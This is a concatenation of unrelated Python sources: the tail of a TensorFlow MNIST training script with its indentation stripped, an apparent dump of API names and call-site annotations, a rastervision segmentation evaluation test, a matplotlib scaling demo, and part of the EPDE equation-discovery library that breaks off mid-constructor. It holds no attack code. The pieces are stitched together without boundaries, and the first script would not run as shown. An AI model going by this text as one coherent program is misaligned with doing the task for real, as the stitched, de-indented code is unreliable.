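    # biases; the default "xent" is plain softmax cross-entropy.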
with tf.name_scope("train"):
train_step = tf.train.AdamOptimizer(learning_rate).minimize(loss)
with tf.name_scope("accuracy"):
correct_prediction = tf.equal(tf.argmax(logit, 1), tf.argmax(y_, 1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
tf.summary.scalar("accuracy", accuracy)
summ = tf.summary.merge_all()
sess.run(tf.global_variables_initializer())
writer_train = tf.summary.FileWriter(LOGDIR + hparam + "_train")
writer_train.add_graph(sess.graph)
writer_test = tf.summary.FileWriter(LOGDIR + hparam + "_test")
writer_test.add_graph(sess.graph)
num_epochs = 200
# training accuracy
list_vacc = list()
for k in range(num_epochs):
print(str(k) + "th epoch")
for i in range(550):
if i % 100 == 0:
batch_xs, batch_ys = mnist.train.next_batch(100)
[train_accuracy, s_train] = sess.run([accuracy, summ],
feed_dict={x: batch_xs, y_: batch_ys})
writer_train.add_summary(s_train, k * 550 + i)
[test_accuracy, s_test] = sess.run([accuracy, summ],
feed_dict={x: mnist.test.images, y_: mnist.test.labels})
writer_test.add_summary(s_test, k * 550 + i)
print('Step {:d}, training accuracy {:g}'.format(k * 550 + i, train_accuracy))
print('Step {:d}, test accuracy {:g}'.format(k * 550 + i, test_accuracy))
sess.run(train_step, feed_dict={x: batch_xs, y_: batch_ys, keep_prob: 0.5})
vacc = accuracy.eval(feed_dict={x: mnist.validation.images, y_: mnist.validation.labels, keep_prob: 1})
list_vacc.append(vacc)
if k > 10 and np.mean(list_vacc[-10:-5]) > np.mean(list_vacc[-5:]):
print("Seems like it starts to overfit, aborting the training")
break
mnist = input_data.read_data_sets('./MNIST_data', one_hot=True)
def make_hparam_string(act_func, learning_rate, objective):
return "%s,lr_%.0E,%s" % (act_func, learning_rate, objective)
def main():
for act_func in ["sigmoid", "relu"]:
# You can try adding some more learning rates
for learning_rate in [1E-4]:
# Include "False" as a value to try different model architectures:
for objective in ["xent", "mean_sq_err", "L2_norm"]:
# def mnist_model(learning_rate, regularization, hparam):
hparam = make_hparam_string(act_func, learning_rate, objective)
print('Starting run for %s' % hparam)
# Actually run with the new settings
mnist_model(learning_rate, objective, hparam, act_func)
if __name__ == '__main__':
main()
|
[
"tensorflow.contrib.keras.losses.mean_squared_error",
"tensorflow.reset_default_graph",
"tensorflow.reshape",
"tensorflow.train.AdamOptimizer",
"tensorflow.matmul",
"numpy.mean",
"tensorflow.GPUOptions",
"tensorflow.truncated_normal",
"tensorflow.nn.softmax",
"tensorflow.nn.relu",
"tensorflow.nn.softmax_cross_entropy_with_logits",
"tensorflow.placeholder",
"tensorflow.cast",
"tensorflow.summary.histogram",
"tensorflow.summary.FileWriter",
"tensorflow.name_scope",
"datetime.datetime.now",
"tensorflow.summary.merge_all",
"tensorflow.summary.image",
"tensorflow.summary.scalar",
"tensorflow.global_variables_initializer",
"tensorflow.constant",
"tensorflow.argmax",
"tensorflow.examples.tutorials.mnist.input_data.read_data_sets",
"tensorflow.nn.l2_loss",
"tensorflow.nn.sigmoid"
] |
[((4916, 4971), 'tensorflow.examples.tutorials.mnist.input_data.read_data_sets', 'input_data.read_data_sets', (['"""./MNIST_data"""'], {'one_hot': '(True)'}), "('./MNIST_data', one_hot=True)\n", (4941, 4971), False, 'from tensorflow.examples.tutorials.mnist import input_data\n'), ((601, 635), 'tensorflow.summary.histogram', 'tf.summary.histogram', (['"""weights"""', 'w'], {}), "('weights', w)\n", (621, 635), True, 'import tensorflow as tf\n'), ((640, 673), 'tensorflow.summary.histogram', 'tf.summary.histogram', (['"""biases"""', 'b'], {}), "('biases', b)\n", (660, 673), True, 'import tensorflow as tf\n'), ((678, 715), 'tensorflow.summary.histogram', 'tf.summary.histogram', (['"""logits"""', 'logit'], {}), "('logits', logit)\n", (698, 715), True, 'import tensorflow as tf\n'), ((1317, 1341), 'tensorflow.reset_default_graph', 'tf.reset_default_graph', ([], {}), '()\n', (1339, 1341), True, 'import tensorflow as tf\n'), ((1489, 1538), 'tensorflow.placeholder', 'tf.placeholder', (['tf.float32', '[None, 784]'], {'name': '"""x"""'}), "(tf.float32, [None, 784], name='x')\n", (1503, 1538), True, 'import tensorflow as tf\n'), ((1553, 1583), 'tensorflow.reshape', 'tf.reshape', (['x', '[-1, 28, 28, 1]'], {}), '(x, [-1, 28, 28, 1])\n', (1563, 1583), True, 'import tensorflow as tf\n'), ((1624, 1661), 'tensorflow.summary.image', 'tf.summary.image', (['"""input"""', 'x_image', '(3)'], {}), "('input', x_image, 3)\n", (1640, 1661), True, 'import tensorflow as tf\n'), ((1695, 1748), 'tensorflow.placeholder', 'tf.placeholder', (['tf.float32', '[None, 10]'], {'name': '"""labels"""'}), "(tf.float32, [None, 10], name='labels')\n", (1709, 1748), True, 'import tensorflow as tf\n'), ((1765, 1791), 'tensorflow.placeholder', 'tf.placeholder', (['tf.float32'], {}), '(tf.float32)\n', (1779, 1791), True, 'import tensorflow as tf\n'), ((1896, 1916), 'tensorflow.nn.softmax', 'tf.nn.softmax', (['logit'], {}), '(logit)\n', (1909, 1916), True, 'import tensorflow as tf\n'), ((3312, 3334), 'tensorflow.summary.merge_all', 'tf.summary.merge_all', ([], {}), '()\n', (3332, 3334), True, 'import tensorflow as tf\n'), ((3403, 3452), 'tensorflow.summary.FileWriter', 'tf.summary.FileWriter', (["(LOGDIR + hparam + '_train')"], {}), "(LOGDIR + hparam + '_train')\n", (3424, 3452), True, 'import tensorflow as tf\n'), ((3510, 3558), 'tensorflow.summary.FileWriter', 'tf.summary.FileWriter', (["(LOGDIR + hparam + '_test')"], {}), "(LOGDIR + hparam + '_test')\n", (3531, 3558), True, 'import tensorflow as tf\n'), ((306, 323), 'tensorflow.nn.relu', 'tf.nn.relu', (['logit'], {}), '(logit)\n', (316, 323), True, 'import tensorflow as tf\n'), ((349, 369), 'tensorflow.nn.sigmoid', 'tf.nn.sigmoid', (['logit'], {}), '(logit)\n', (362, 369), True, 'import tensorflow as tf\n'), ((429, 481), 'tensorflow.truncated_normal', 'tf.truncated_normal', (['[size_in, size_out]'], {'stddev': '(0.1)'}), '([size_in, size_out], stddev=0.1)\n', (448, 481), True, 'import tensorflow as tf\n'), ((513, 547), 'tensorflow.constant', 'tf.constant', (['(0.1)'], {'shape': '[size_out]'}), '(0.1, shape=[size_out])\n', (524, 547), True, 'import tensorflow as tf\n'), ((572, 591), 'tensorflow.matmul', 'tf.matmul', (['input', 'w'], {}), '(input, w)\n', (581, 591), True, 'import tensorflow as tf\n'), ((833, 852), 'tensorflow.name_scope', 'tf.name_scope', (['name'], {}), '(name)\n', (846, 852), True, 'import tensorflow as tf\n'), ((959, 993), 'tensorflow.summary.histogram', 'tf.summary.histogram', (['"""weights"""', 'w'], {}), "('weights', w)\n", (979, 993), True, 'import tensorflow as 
tf\n'), ((1002, 1035), 'tensorflow.summary.histogram', 'tf.summary.histogram', (['"""biases"""', 'b'], {}), "('biases', b)\n", (1022, 1035), True, 'import tensorflow as tf\n'), ((1044, 1084), 'tensorflow.summary.histogram', 'tf.summary.histogram', (['"""activations"""', 'act'], {}), "('activations', act)\n", (1064, 1084), True, 'import tensorflow as tf\n'), ((2965, 2987), 'tensorflow.name_scope', 'tf.name_scope', (['"""train"""'], {}), "('train')\n", (2978, 2987), True, 'import tensorflow as tf\n'), ((3073, 3098), 'tensorflow.name_scope', 'tf.name_scope', (['"""accuracy"""'], {}), "('accuracy')\n", (3086, 3098), True, 'import tensorflow as tf\n'), ((3260, 3299), 'tensorflow.summary.scalar', 'tf.summary.scalar', (['"""accuracy"""', 'accuracy'], {}), "('accuracy', accuracy)\n", (3277, 3299), True, 'import tensorflow as tf\n'), ((3349, 3382), 'tensorflow.global_variables_initializer', 'tf.global_variables_initializer', ([], {}), '()\n', (3380, 3382), True, 'import tensorflow as tf\n'), ((2000, 2028), 'tensorflow.name_scope', 'tf.name_scope', (['"""mean_sq_err"""'], {}), "('mean_sq_err')\n", (2013, 2028), True, 'import tensorflow as tf\n'), ((2134, 2179), 'tensorflow.summary.scalar', 'tf.summary.scalar', (['"""mean_sq_err"""', 'mean_sq_err'], {}), "('mean_sq_err', mean_sq_err)\n", (2151, 2179), True, 'import tensorflow as tf\n'), ((3138, 3157), 'tensorflow.argmax', 'tf.argmax', (['logit', '(1)'], {}), '(logit, 1)\n', (3147, 3157), True, 'import tensorflow as tf\n'), ((3159, 3175), 'tensorflow.argmax', 'tf.argmax', (['y_', '(1)'], {}), '(y_, 1)\n', (3168, 3175), True, 'import tensorflow as tf\n'), ((3211, 3250), 'tensorflow.cast', 'tf.cast', (['correct_prediction', 'tf.float32'], {}), '(correct_prediction, tf.float32)\n', (3218, 3250), True, 'import tensorflow as tf\n'), ((183, 197), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (195, 197), False, 'from datetime import datetime\n'), ((2071, 2120), 'tensorflow.contrib.keras.losses.mean_squared_error', 'tf.contrib.keras.losses.mean_squared_error', (['Y', 'y_'], {}), '(Y, y_)\n', (2113, 2120), True, 'import tensorflow as tf\n'), ((2261, 2285), 'tensorflow.name_scope', 'tf.name_scope', (['"""L2_norm"""'], {}), "('L2_norm')\n", (2274, 2285), True, 'import tensorflow as tf\n'), ((2624, 2661), 'tensorflow.summary.scalar', 'tf.summary.scalar', (['"""L2_norm"""', 'L2_norm'], {}), "('L2_norm', L2_norm)\n", (2641, 2661), True, 'import tensorflow as tf\n'), ((2712, 2733), 'tensorflow.name_scope', 'tf.name_scope', (['"""xent"""'], {}), "('xent')\n", (2725, 2733), True, 'import tensorflow as tf\n'), ((2898, 2929), 'tensorflow.summary.scalar', 'tf.summary.scalar', (['"""xent"""', 'xent'], {}), "('xent', xent)\n", (2915, 2929), True, 'import tensorflow as tf\n'), ((3010, 3047), 'tensorflow.train.AdamOptimizer', 'tf.train.AdamOptimizer', (['learning_rate'], {}), '(learning_rate)\n', (3032, 3047), True, 'import tensorflow as tf\n'), ((4759, 4785), 'numpy.mean', 'np.mean', (['list_vacc[-10:-5]'], {}), '(list_vacc[-10:-5])\n', (4766, 4785), True, 'import numpy as np\n'), ((4788, 4811), 'numpy.mean', 'np.mean', (['list_vacc[-5:]'], {}), '(list_vacc[-5:])\n', (4795, 4811), True, 'import numpy as np\n'), ((1409, 1459), 'tensorflow.GPUOptions', 'tf.GPUOptions', ([], {'per_process_gpu_memory_fraction': '(0.4)'}), '(per_process_gpu_memory_fraction=0.4)\n', (1422, 1459), True, 'import tensorflow as tf\n'), ((2338, 2402), 'tensorflow.nn.softmax_cross_entropy_with_logits', 'tf.nn.softmax_cross_entropy_with_logits', ([], {'logits': 'logit', 'labels': 'y_'}), 
'(logits=logit, labels=y_)\n', (2377, 2402), True, 'import tensorflow as tf\n'), ((2786, 2850), 'tensorflow.nn.softmax_cross_entropy_with_logits', 'tf.nn.softmax_cross_entropy_with_logits', ([], {'logits': 'logit', 'labels': 'y_'}), '(logits=logit, labels=y_)\n', (2825, 2850), True, 'import tensorflow as tf\n'), ((2593, 2610), 'tensorflow.nn.l2_loss', 'tf.nn.l2_loss', (['B2'], {}), '(B2)\n', (2606, 2610), True, 'import tensorflow as tf\n'), ((2573, 2590), 'tensorflow.nn.l2_loss', 'tf.nn.l2_loss', (['W2'], {}), '(W2)\n', (2586, 2590), True, 'import tensorflow as tf\n'), ((2533, 2550), 'tensorflow.nn.l2_loss', 'tf.nn.l2_loss', (['W1'], {}), '(W1)\n', (2546, 2550), True, 'import tensorflow as tf\n'), ((2553, 2570), 'tensorflow.nn.l2_loss', 'tf.nn.l2_loss', (['B1'], {}), '(B1)\n', (2566, 2570), True, 'import tensorflow as tf\n')]
|
import unittest
import numpy as np
from rastervision.core.class_map import (ClassItem, ClassMap)
from rastervision.evaluations.segmentation_evaluation import (
SegmentationEvaluation)
from rastervision.label_stores.segmentation_raster_file import (
SegmentationInputRasterFile)
from rastervision.label_stores.segmentation_raster_file_test import (
TestingRasterSource)
class TestSegmentationEvaluation(unittest.TestCase):
def test_compute(self):
class_map = ClassMap(
[ClassItem(id=1, name='one'),
ClassItem(id=2, name='two')])
raster_class_map = {'#010101': 1, '#020202': 2}
gt_array = np.ones((5, 5, 3), dtype=np.uint8)
gt_array[0, 0, :] = 0
gt_array[2, 2, :] = 2
gt_raster = TestingRasterSource(data=gt_array)
gt_label_store = SegmentationInputRasterFile(
source=gt_raster, raster_class_map=raster_class_map)
p_array = np.ones((4, 4, 3), dtype=np.uint8)
p_array[1, 1, :] = 0
p_raster = TestingRasterSource(data=p_array)
p_label_store = SegmentationInputRasterFile(
source=p_raster, raster_class_map=raster_class_map)
seval = SegmentationEvaluation()
seval.compute(class_map, gt_label_store, p_label_store)
tp1 = 16 - 3 # 4*4 - 3 true positives for class 1
fp1 = 1 # 1 false positive (2,2) and one don't care at (0,0)
fn1 = 1 # one false negative (1,1)
precision1 = float(tp1) / (tp1 + fp1)
recall1 = float(tp1) / (tp1 + fn1)
tp2 = 0 # 0 true positives for class 2
fn2 = 1 # one false negative (2,2)
precision2 = None # float(tp2) / (tp2 + fp2) where fp2 == 0
recall2 = float(tp2) / (tp2 + fn2)
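        # With the counts above: precision1 = recall1 = 13/14 (about 0.929) for class 1;
        # class 2 has no predicted pixels, so its precision is undefined (None) and
        # recall2 = 0/1 = 0.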
self.assertAlmostEqual(precision1,
seval.class_to_eval_item[1].precision)
self.assertAlmostEqual(recall1, seval.class_to_eval_item[1].recall)
self.assertEqual(precision2, seval.class_to_eval_item[2].precision)
self.assertAlmostEqual(recall2, seval.class_to_eval_item[2].recall)
if __name__ == "__main__":
unittest.main()
|
[
"unittest.main",
"numpy.ones",
"rastervision.core.class_map.ClassItem",
"rastervision.label_stores.segmentation_raster_file.SegmentationInputRasterFile",
"rastervision.label_stores.segmentation_raster_file_test.TestingRasterSource",
"rastervision.evaluations.segmentation_evaluation.SegmentationEvaluation"
] |
[((2129, 2144), 'unittest.main', 'unittest.main', ([], {}), '()\n', (2142, 2144), False, 'import unittest\n'), ((658, 692), 'numpy.ones', 'np.ones', (['(5, 5, 3)'], {'dtype': 'np.uint8'}), '((5, 5, 3), dtype=np.uint8)\n', (665, 692), True, 'import numpy as np\n'), ((773, 807), 'rastervision.label_stores.segmentation_raster_file_test.TestingRasterSource', 'TestingRasterSource', ([], {'data': 'gt_array'}), '(data=gt_array)\n', (792, 807), False, 'from rastervision.label_stores.segmentation_raster_file_test import TestingRasterSource\n'), ((833, 918), 'rastervision.label_stores.segmentation_raster_file.SegmentationInputRasterFile', 'SegmentationInputRasterFile', ([], {'source': 'gt_raster', 'raster_class_map': 'raster_class_map'}), '(source=gt_raster, raster_class_map=raster_class_map\n )\n', (860, 918), False, 'from rastervision.label_stores.segmentation_raster_file import SegmentationInputRasterFile\n'), ((946, 980), 'numpy.ones', 'np.ones', (['(4, 4, 3)'], {'dtype': 'np.uint8'}), '((4, 4, 3), dtype=np.uint8)\n', (953, 980), True, 'import numpy as np\n'), ((1029, 1062), 'rastervision.label_stores.segmentation_raster_file_test.TestingRasterSource', 'TestingRasterSource', ([], {'data': 'p_array'}), '(data=p_array)\n', (1048, 1062), False, 'from rastervision.label_stores.segmentation_raster_file_test import TestingRasterSource\n'), ((1087, 1166), 'rastervision.label_stores.segmentation_raster_file.SegmentationInputRasterFile', 'SegmentationInputRasterFile', ([], {'source': 'p_raster', 'raster_class_map': 'raster_class_map'}), '(source=p_raster, raster_class_map=raster_class_map)\n', (1114, 1166), False, 'from rastervision.label_stores.segmentation_raster_file import SegmentationInputRasterFile\n'), ((1197, 1221), 'rastervision.evaluations.segmentation_evaluation.SegmentationEvaluation', 'SegmentationEvaluation', ([], {}), '()\n', (1219, 1221), False, 'from rastervision.evaluations.segmentation_evaluation import SegmentationEvaluation\n'), ((509, 536), 'rastervision.core.class_map.ClassItem', 'ClassItem', ([], {'id': '(1)', 'name': '"""one"""'}), "(id=1, name='one')\n", (518, 536), False, 'from rastervision.core.class_map import ClassItem, ClassMap\n'), ((551, 578), 'rastervision.core.class_map.ClassItem', 'ClassItem', ([], {'id': '(2)', 'name': '"""two"""'}), "(id=2, name='two')\n", (560, 578), False, 'from rastervision.core.class_map import ClassItem, ClassMap\n')]
|
import numpy as np
import matplotlib.pyplot as plt
# %matplotlib inline (scaling)
plt.style.use('ggplot')
plt.rcParams['figure.figsize'] = (12, 8)
# Normal distributed x and y vector with mean 0 and standard deviation 1
x = np.random.normal(0, 1, 200)
y = np.random.normal(0, 1, 200)
X = np.vstack((x, y)) # 2xn
# Scaling
sx, sy = 0.5, 2.0
Scale = np.array([[sx, 0], [0, sy]])
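# Diagonal scaling matrix: x-coordinates are multiplied by sx = 0.5 and y-coordinates
# by sy = 2.0, i.e. Y = Scale.dot(X) applies the anisotropic scaling to every column of X.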
Y = Scale.dot(X)
# Original point set
plt.scatter(X[0, :], X[1, :])
# Points after scaling
plt.scatter(Y[0, :], Y[1, :])
plt.title('Generated Data')
plt.axis('equal')
plt.show()
|
[
"matplotlib.pyplot.title",
"matplotlib.pyplot.show",
"matplotlib.pyplot.scatter",
"matplotlib.pyplot.axis",
"matplotlib.pyplot.style.use",
"numpy.array",
"numpy.random.normal",
"numpy.vstack"
] |
[((76, 99), 'matplotlib.pyplot.style.use', 'plt.style.use', (['"""ggplot"""'], {}), "('ggplot')\n", (89, 99), True, 'import matplotlib.pyplot as plt\n'), ((219, 246), 'numpy.random.normal', 'np.random.normal', (['(0)', '(1)', '(200)'], {}), '(0, 1, 200)\n', (235, 246), True, 'import numpy as np\n'), ((251, 278), 'numpy.random.normal', 'np.random.normal', (['(0)', '(1)', '(200)'], {}), '(0, 1, 200)\n', (267, 278), True, 'import numpy as np\n'), ((283, 300), 'numpy.vstack', 'np.vstack', (['(x, y)'], {}), '((x, y))\n', (292, 300), True, 'import numpy as np\n'), ((339, 367), 'numpy.array', 'np.array', (['[[sx, 0], [0, sy]]'], {}), '([[sx, 0], [0, sy]])\n', (347, 367), True, 'import numpy as np\n'), ((393, 422), 'matplotlib.pyplot.scatter', 'plt.scatter', (['X[0, :]', 'X[1, :]'], {}), '(X[0, :], X[1, :])\n', (404, 422), True, 'import matplotlib.pyplot as plt\n'), ((430, 459), 'matplotlib.pyplot.scatter', 'plt.scatter', (['Y[0, :]', 'Y[1, :]'], {}), '(Y[0, :], Y[1, :])\n', (441, 459), True, 'import matplotlib.pyplot as plt\n'), ((460, 487), 'matplotlib.pyplot.title', 'plt.title', (['"""Generated Data"""'], {}), "('Generated Data')\n", (469, 487), True, 'import matplotlib.pyplot as plt\n'), ((488, 505), 'matplotlib.pyplot.axis', 'plt.axis', (['"""equal"""'], {}), "('equal')\n", (496, 505), True, 'import matplotlib.pyplot as plt\n'), ((506, 516), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (514, 516), True, 'import matplotlib.pyplot as plt\n')]
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Jan 11 16:22:17 2021
@author: mike_ubuntu
"""
import numpy as np
from functools import reduce
import copy
import gc
import time
import datetime
import pickle
import warnings
import epde.globals as global_var
import torch
from epde.decorators import History_Extender, Reset_equation_status
from epde.interface.token_family import TF_Pool
from epde.factor import Factor
from epde.supplementary import Filter_powers, Population_Sort, flatten
import epde.moeadd.moeadd_stc as moeadd
def Check_Unqueness(obj, background):
return not any([elem == obj for elem in background])
def normalize_ts(Input):
# print('normalize_ts Input:', Input)
matrix = np.copy(Input)
# print(Matrix.shape)
if np.ndim(matrix) == 0:
        raise ValueError('Incorrect input to the normalization: the data has 0 dimensions')
elif np.ndim(matrix) == 1:
return matrix
else:
for i in np.arange(matrix.shape[0]):
# print(matrix[i].shape)
std = np.std(matrix[i])
if std != 0:
matrix[i] = (matrix[i] - np.mean(matrix[i])) / std
else:
matrix[i] = 1
return matrix
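# normalize_ts applies a per-slice z-score along the first axis: each slice is centred
# on its mean and divided by its standard deviation, slices with zero variance are set
# to 1, and 1-D inputs are returned unchanged (the input is copied, not modified in place).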
class Complex_Structure(object):
def __init__(self, interelement_operator = np.add, *params):
self._history = ''
self.structure = None
self.interelement_operator = interelement_operator
def __eq__(self, other):
if type(other) != type(self):
raise ValueError('Type of self and other are different')
return (all([any([other_elem == self_elem for other_elem in other.structure]) for self_elem in self.structure]) and
all([any([other_elem == self_elem for self_elem in self.structure]) for other_elem in other.structure]) and
len(other.structure) == len(self.structure))
def set_evaluator(self, evaluator):
raise NotImplementedError('Functionality of this method has been moved to the evolutionary operator declaration')
def evaluate(self, structural = False):
assert len(self.structure) > 0, 'Attempt to evaluate an empty complex structure'
if len(self.structure) == 1:
return self.structure[0].evaluate(structural)
else:
# print([type(elem) for elem in self.structure])
return reduce(lambda x, y: self.interelement_operator(x, y.evaluate(structural)),
self.structure[1:], self.structure[0].evaluate(structural))
def reset_saved_state(self):
self.saved = {True:False, False:False}
self.saved_as = {True:None, False:None}
for elem in self.structure:
elem.reset_saved_state()
@property
def name(self):
pass
class Term(Complex_Structure):
__slots__ = ['_history', 'structure', 'interelement_operator', 'saved', 'saved_as',
'pool', 'max_factors_in_term', 'cache_linked', 'occupied_tokens_labels']
def __init__(self, pool, passed_term = None, max_factors_in_term = 1, forbidden_tokens = None,
interelement_operator = np.multiply):
super().__init__(interelement_operator)
self.pool = pool
self.max_factors_in_term = max_factors_in_term
if type(passed_term) == type(None):
self.Randomize(forbidden_tokens)
else:
self.Defined(passed_term)
if type(global_var.tensor_cache) != type(None):
self.use_cache()
self.reset_saved_state() # key - state of normalization, value - if the variable is saved in cache
@property
def cache_label(self):
if len(self.structure) > 1:
structure_sorted = sorted(self.structure, key = lambda x: x.cache_label)
cache_label = tuple([elem.cache_label for elem in structure_sorted])#reduce(form_label, structure_sorted, '')
else:
cache_label = self.structure[0].cache_label
return cache_label
def use_cache(self):
self.cache_linked = True
# print('structure:', self.structure)
for idx, _ in enumerate(self.structure):
if not self.structure[idx].cache_linked:
self.structure[idx].use_cache()
def Defined(self, passed_term):
self.structure = []
print('passed_term:', passed_term)
if isinstance(passed_term, (list, tuple)): #type(passed_term) == list or type(passed_term) == tuple:
for i, factor in enumerate(passed_term):
if type(factor) == str:
_, temp_f = self.pool.create(label = factor)
self.structure.append(temp_f)#; raise NotImplementedError
elif type(factor) == Factor:
self.structure.append(factor)
else:
raise ValueError('The structure of a term should be declared with str or factor.Factor obj, instead got', type(factor))
        else: # Case when only a single token is passed
if type(passed_term) == str:
_, temp_f = self.pool.create(label = passed_term)
self.structure.append(temp_f)#; raise NotImplementedError
elif type(passed_term) == Factor:
self.structure.append(passed_term)
else:
raise ValueError('The structure of a term should be declared with str or factor.Factor obj, instead got', type(passed_term))
def Randomize(self, forbidden_factors = None, **kwargs):
if np.sum(self.pool.families_cardinality(meaningful_only = True)) == 0:
raise ValueError('No token families are declared as meaningful for the process of the system search')
factors_num = np.random.randint(1, self.max_factors_in_term +1)
while True:
self.occupied_tokens_labels = []
occupied_by_factor, factor = self.pool.create(label = None, create_meaningful = True,
occupied = self.occupied_tokens_labels, **kwargs)
self.structure = [factor,]
self.occupied_tokens_labels.extend(occupied_by_factor)
factors_powers = {factor.label : 1}
for i in np.arange(1, factors_num):
occupied_by_factor, factor = self.pool.create(label = None, create_meaningful = False,
occupied = self.occupied_tokens_labels,
def_term_tokens = [token.label for token in self.structure],
**kwargs)
if factor.label in factors_powers:
factors_powers[factor.label] += 1
else:
factors_powers[factor.label] = 1
for param_idx, param_descr in factor.params_description.items():
if param_descr['name'] == 'power': power_param_idx = param_idx
if factors_powers[factor.label] == factor.params_description[power_param_idx]['bounds'][1]:
self.occupied_tokens_labels.append(factor.label)
self.structure.append(factor)
self.occupied_tokens_labels.extend(occupied_by_factor)
self.structure = Filter_powers(self.structure)
if type(forbidden_factors) == type(None):
break
elif all([(Check_Unqueness(factor, forbidden_factors) or not factor.status['unique_for_right_part']) for factor in self.structure]):
break
def evaluate(self, structural):
assert type(global_var.tensor_cache) != type(None), 'Currently working only with connected cache'
normalize = structural
if self.saved[structural] or (self.cache_label, normalize) in global_var.tensor_cache: #
value = global_var.tensor_cache.get(self.cache_label, normalized = normalize,
saved_as = self.saved_as[normalize])
value = value.reshape(value.size)
return value
else:
self.prev_normalized = normalize
value = super().evaluate(structural)
if normalize and np.ndim(value) != 1:
value = normalize_ts(value)
elif normalize and np.ndim(value) == 1 and np.std(value) != 0:
value = (value - np.mean(value))/np.std(value)
elif normalize and np.ndim(value) == 1 and np.std(value) == 0:
value = (value - np.mean(value))
if np.all([len(factor.params) == 1 for factor in self.structure]):
                self.saved[normalize] = global_var.tensor_cache.add(self.cache_label, value, normalized = normalize) # Possible trouble spot: saving/loading of normalized data
if self.saved[normalize]: self.saved_as[normalize] = self.cache_label
value = value.reshape(value.size)
return value
def Filter_tokens_by_right_part(self, reference_target, equation, equation_position):
taken_tokens = [factor.label for factor in reference_target.structure if factor.status['unique_for_right_part']]
meaningful_taken = any([factor.status['meaningful'] for factor in reference_target.structure
if factor.status['unique_for_right_part']])
accept_term_try = 0
while True:
accept_term_try += 1
new_term = copy.deepcopy(self)
for factor_idx, factor in enumerate(new_term.structure):
if factor.label in taken_tokens:
new_term.Reset_occupied_tokens()
_, new_term.structure[factor_idx] = self.pool.create(create_meaningful=meaningful_taken,
occupied = new_term.occupied_tokens_labels + taken_tokens)
# print('try:', accept_term_try, 'suggested:', new_term.name)
            # Possible error due to (not) using "create meaningful"
if Check_Unqueness(new_term, equation.structure[:equation_position] +
equation.structure[equation_position + 1 :]):
self.structure = new_term.structure
self.structure = Filter_powers(self.structure)
self.reset_saved_state()
break
if accept_term_try == 10:
warnings.warn('Can not create unique term, while filtering equation tokens in regards to the right part.')
if accept_term_try >= 10:
self.Randomize(forbidden_factors = new_term.occupied_tokens_labels + taken_tokens)
if accept_term_try == 100:
print('Something wrong with the random generation of term while running "Filter_tokens_by_right_part"')
print('proposed', new_term.name, 'for ', equation.text_form, 'with respect to', reference_target.name)
def Reset_occupied_tokens(self):
occupied_tokens_new = []
for factor in self.structure:
for token_family in self.pool.families:
if factor in token_family.tokens and factor.status['unique_token_type']:
occupied_tokens_new.extend([token for token in token_family.tokens])
elif factor.status['unique_specific_token']:
occupied_tokens_new.append(factor.label)
self.occupied_tokens_labels = occupied_tokens_new
@property
    def available_tokens(self): # TODO: rework, since the token pool changes; the old implementation used a list
available_tokens = []
for token in self.pool.families:
if not all([label in self.occupied_tokens_labels for label in token.tokens]):
token_new = copy.deepcopy(token)
token_new.tokens = [label for label in token.tokens if label not in self.occupied_tokens_labels]
available_tokens.append(token_new)
return available_tokens
@property
def total_params(self):
return max(sum([len(element.params) - 1 for element in self.structure]), 1)
@property
def name(self):
form = ''
for token_idx in range(len(self.structure)):
form += self.structure[token_idx].name
if token_idx < len(self.structure) - 1:
form += ' * '
return form
@property
def contains_deriv(self):
return any([factor.is_deriv and factor.deriv_code != [None,] for factor in self.structure])
@property
def solver_form(self):
deriv_orders = []
deriv_powers = []
try:
coeff_tensor = np.ones_like(global_var.grid_cache.get('0'))
except KeyError:
raise NotImplementedError('No cache implemented')
for factor in self.structure:
if factor.is_deriv:
for param_idx, param_descr in factor.params_description.items():
if param_descr['name'] == 'power': power_param_idx = param_idx
deriv_orders.append(factor.deriv_code); deriv_powers.append(factor.params[power_param_idx])
else:
coeff_tensor = coeff_tensor * factor.evaluate()
# deriv_orders.append(factor.deriv_code); deriv_powers.append(1)
if len(deriv_powers) == 1:
deriv_powers = deriv_powers[0]
deriv_orders = deriv_orders[0]
coeff_tensor = torch.from_numpy(coeff_tensor)
return [coeff_tensor, deriv_orders, deriv_powers]
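    # solver_form (above) packs a term into the triplet [coeff_tensor, deriv_orders,
    # deriv_powers]: a torch tensor holding the product of all non-derivative factors on
    # the grid, the derivative codes of the derivative factors, and their powers (both
    # unwrapped from single-element lists when only one derivative factor is present).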
def __eq__(self, other):
return (all([any([other_elem == self_elem for other_elem in other.structure]) for self_elem in self.structure]) and
all([any([other_elem == self_elem for self_elem in self.structure]) for other_elem in other.structure]) and
len(other.structure) == len(self.structure))
class Equation(Complex_Structure):
__slots__ = ['_history', 'structure', 'interelement_operator', 'saved', 'saved_as',
'n_immutable', 'pool', 'terms_number', 'max_factors_in_term', 'operator',
'_target', 'target_idx', '_features', 'right_part_selected',
'_weights_final', 'weights_final_evald', '_weights_internal', 'weights_internal_evald',
'fitness_calculated', 'solver_form_defined', '_solver_form', '_fitness_value',
'crossover_selected_times', 'elite']
def __init__(self, pool, basic_structure, terms_number = 6, max_factors_in_term = 2,
interelement_operator = np.add): #eq_weights_eval
"""
Class for the single equation for the dynamic system.
attributes:
structure : list of Term objects \r\n
List, containing all terms of the equation; first 2 terms are reserved for constant value and the input function;
target_idx : int \r\n
Index of the target term, selected in the Split phase;
target : 1-d array of float \r\n
values of the Term object, reshaped into 1-d array, designated as target for application in sparse regression;
features : matrix of float \r\n
matrix, composed of terms, not included in target, value columns, designated as features for application in sparse regression;
fitness_value : float \r\n
            Inverse value of squared error for the selected target function and features and discovered weights;
estimator : sklearn estimator of selected type \r\n
parameters:
Matrix of derivatives: first axis through various orders/coordinates in order: ['1', 'f', all derivatives by one coordinate axis
in increasing order, ...]; second axis: time, further - spatial coordinates;
tokens : list of strings \r\n
Symbolic forms of functions, including derivatives;
terms_number : int, base value of 6 \r\n
Maximum number of terms in the discovered equation;
max_factors_in_term : int, base value of 2\r\n
Maximum number of factors, that can form a term (e.g. with 2: df/dx_1 * df/dx_2)
"""
super().__init__(interelement_operator)
self.reset_state()
self.n_immutable = len(basic_structure)
# print('n_immutable', self.n_immutable)
self.pool = pool
self.structure = []
self.terms_number = terms_number; self.max_factors_in_term = max_factors_in_term
self.operator = None
if (terms_number < self.n_immutable):
raise Exception('Number of terms ({}) is too low to even contain all of the pre-determined ones'.format(terms_number))
